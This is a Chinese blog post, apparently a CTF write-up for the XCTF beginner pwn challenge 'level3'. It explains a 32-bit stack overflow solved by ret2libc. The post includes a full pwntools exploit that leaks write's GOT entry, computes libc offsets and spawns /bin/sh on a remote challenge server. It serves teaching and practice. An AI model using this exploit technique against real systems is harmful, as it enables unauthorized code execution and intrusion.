攻防世界新手区level3

最新推荐文章于 2022-11-05 11:29:54 发布
最新推荐文章于 2022-11-05 11:29:54 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: PWN CTF 文章标签: python 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bocaiaichila/article/details/120862228
版权
CTF 同时被 2 个专栏收录
7 篇文章 2 订阅
订阅专栏
PWN
6 篇文章 0 订阅
订阅专栏

攻防世界新手区level3

下载附件解压之后直接拖进虚拟机,发现还是个压缩包,原来是三个压缩包的套娃,重复操作:加一下后缀.zip解压,得到题目,题目把libc也给了
在这里插入图片描述
checksec level3
在这里插入图片描述

在这里插入图片描述没什么保护,而且buf明显可以溢出
查找字符串果然如题目是没有system和binsh的
在这里插入图片描述

那么我们可以利用write函数(因为write调用过好几次了)得出偏移量,32位程序不同于64位需要寄存器传参而是可以直接传参的。
题目还直接给了libc
看之前写的32位程序的最基本的ret2libc原理就能会了
EXP:

from pwn import *
p=remote('111.200.241.244',53112)
elf=ELF("./level3")

vul_addr=0x8048495
write_plt=elf.plt["write"]
write_got=elf.got["write"]

libc=ELF("./libc_32.so.6")
write_libc=libc.symbols["write"]
sys_libc=libc.symbols["system"]
binsh_libc=libc.search("/bin/sh").next()
padding='a'*(0x88+4)
payload1 = padding+p32(write_plt)+p32(vul_addr)+p32(1)+p32(write_got)+p32(4)
p.recvline()
p.sendline(payload1)

write_addr=u32(p.recv(4))

offsite=write_addr-write_libc
sys_addr=offsite+sys_libc
binsh_addr=offsite+binsh_libc

payload2=padding+p32(sys_addr)+p32(vul_addr)+p32(binsh_addr)
p.recvuntil("Input:\n")
p.sendline(payload2)
p.interactive()

运行结果:
在这里插入图片描述

ca1m4n
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3254
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
[攻防世界]level3
逆向萌新的博客
06-18 360
[攻防世界]level3,详细
攻防世界 level3
BengDouLove的博客
03-26 506
整个程序就这么几行代码, vul函数里有明显栈溢出,猜测是覆盖返回地址为system,,,但是程序里没有system也没有binsh,所以只能自己泄露 查一查write函数,三个参数,第一个为1代表输出,第二个是要输出东西的指针,第三个是输出长度 所以可以利用wirte,把第二个参数改为某个libc里面函数的地址,泄露出来,然后根据偏移得到system和binsh 但是只有一个read函数并不...
攻防世界level3
qq_25044201的博客
12-31 437
ida分析一下 发现这次level3是除了前两个显示最少的,俗话说得好,给得越少,越难。 发现没有system,也没有/bin/sh 当然这有个溢出点,可是只有溢出点 我们下载下来,发现有个libc库 我们先巩固一个知识,当调用一个函数时候,会调用plt,然后plt调用got表,如果是动态链接,got表会从libc库里找这个函数。 当然我们可以先泄露write函数的got表的地址,然后通过write-system=libc中write函数和system函数的差值找到system函数,同理找到/bi.
攻防世界Level3
WangLal的博客
07-05 290
攻防世界PWN新手level3的WP 基本三步:checksec,file,执行文件 只开了NX防护,且是个32位的文件 放进IDA中查看 main函数中只调用了一个函数,vulnerable_function(),进入函数中查看 发现read函数可以制造栈溢出漏洞。 要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到s
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
level0 -- 攻防世界新手
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
俄罗斯套娃问题 C++代码
05-22
这是俄罗斯套娃问题的C++代码,你应该好好学习。这循序渐进的讲解,使你可快速掌握递归算法,并称为软件专家。
攻防世界pwn——level3
qq_62076255的博客
11-05 601
攻防世界pwn——level3
攻防世界新——level3
weixin_62675330的博客
02-10 1404
攻防世界 – pwn新手 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界 新手 level3
winterze的博客
04-04 386
分享一位师傅写得,很详细,对我们小白很有帮助 https://www.cnblogs.com/cloud-tree/p/11929585.html 攻防世界 新手 level3 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stac...
[攻防世界 pwn]——level3
Y_peak的博客
02-19 179
题目地址: https://adworld.xctf.org.cn/ 题目: 以前写过这个write up请点击 偷个懒, 师傅们不要介意
攻防世界 Pwn level3
MrTreebook的博客
11-22 273
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
攻防世界 pwn level3
Bsecure的博客
06-06 998
level3 开始查保护后没注意到NX,在栈上几次没执行成功才回去看到。这个题实际还是栈溢出,但多考了很多知识点,对刚接触pwn收获还是很大。 首先查保护,只开了NX,没有canary,那就可以往靠溢出控制程序走向了的方向看题。 载入ida后,栈溢出很明显。 但利用起来,既没有有system函数,也没有’/bin/sh’。这对于刚接触pwn还是比较困难的,但本来就学习的过程,看了writeup又去学了下.plt与.got再来做的题。 其实程序带了一个运行库的,里面有动态链接库的函数
攻防世界-pwn新手-level3
CHAWUCIREN1的博客
09-22 343
先检查运行一下 ida 看一下vulnerable_function函数 发现存在溢出,栈空间136,可以输入的长度256 但是没有发现system函数和/bin/sh 题目给了libc文件,可以 考虑利用一下 把libc丢到ida里面
浅谈rop-ret2libc原理以及解答-以攻防世界level3为例
pointerr的博客
08-05 524
栈溢出-rop-libc 0x01、got表和plt表与动态链接、绑定延迟(重点理解) GOT概述 1、当在程序中引用某个共享库中的符号时,编译链接阶段并不知道这个符号的具体位置,只有等到动态链接器将所需要的共享库加载进内存后,也就是在运行阶段,符号的地址才会最终确定。因此,需要有一个数据结构来保存符号的绝对地址,这就是GOT表的作用,GOT表中每项保存程序中引用其他符号的绝对地址。这样,程序就可以通过引用GOT表来获得某个符号的地址 2、在X86结构中,GOT表的前三项保留,用于保存特殊的数据结构地址,其
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ca1m4n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值